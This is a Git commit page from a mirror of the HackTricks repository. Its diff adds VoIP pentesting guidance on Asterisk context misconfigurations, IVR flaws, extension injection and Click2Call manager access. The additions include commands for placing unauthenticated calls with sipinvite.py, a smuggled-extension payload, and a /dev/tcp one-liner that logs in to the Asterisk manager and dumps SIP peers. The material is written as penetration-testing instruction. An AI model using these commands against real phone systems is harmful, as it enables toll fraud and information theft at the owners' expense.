0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GITBOOK-3877: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-04-18 04:09:32 +00:00 committed by gitbook-bot
parent 679bd88424
commit 551efedf6a
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 138 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

141
network-services-pentesting/pentesting-voip/README.md
View File

@ -20,8 +20,6 @@ To start learning about how VoIP works check:
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}
## VoIP Red Team Methodology
## VoIP Enumeration
### Telephone Numbers
@ -225,7 +223,7 @@ It's possible to send these codes in **INFO SIP messages**, in **audio** or insi
multimon -a DTMF -t wac pin.wav
```
### Asterisks Misconfigurations
### Asterisks Connections Misconfigurations
In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
@ -257,6 +255,143 @@ For example, this configuration would be vulnerable:\
`type=friend`
{% endhint %}
### Asterisks Context Misconfigurations
In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
```bash
csharpCopy code[my_context]
```
Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
```scss
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
```
This example demonstrates a simple context called "my\_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
This is **another context** that allows to **call to any other number**:
```scss
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
```
If the admin defines the **default context** as:
```
[default]
include => my_context
include => external
```
{% hint style="warning" %}
Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call).
{% endhint %}
{% hint style="danger" %}
Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
{% endhint %}
* **`sipinvite.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
```
{% endcode %}
### Misconfigured IVRS
IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
IVRS in VoIP systems typically consists of:
1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow.
#### Example of vulnerable configuration
```scss
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
```
The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\
The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.**
### Extension Injection
Using a extension such as:
```scss
exten => _X.,1,Dial(SIP/${EXTEN})
```
Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen:
```scss
exten => 101,1,Dial(SIP/101)
```
However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
```scss
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
```
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
### Click2Call
Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
A common Asterisk profile for this is:
```scss
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
```
* The previos profile is allowing **ANY IP address to connect** (if the password is known).
* To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed.
With those permissions any IP knowing the password could connect and extract too much info, like:
{% code overflow="wrap" %}
```bash
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
```
{% endcode %}
**More information or actions could be requested.**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>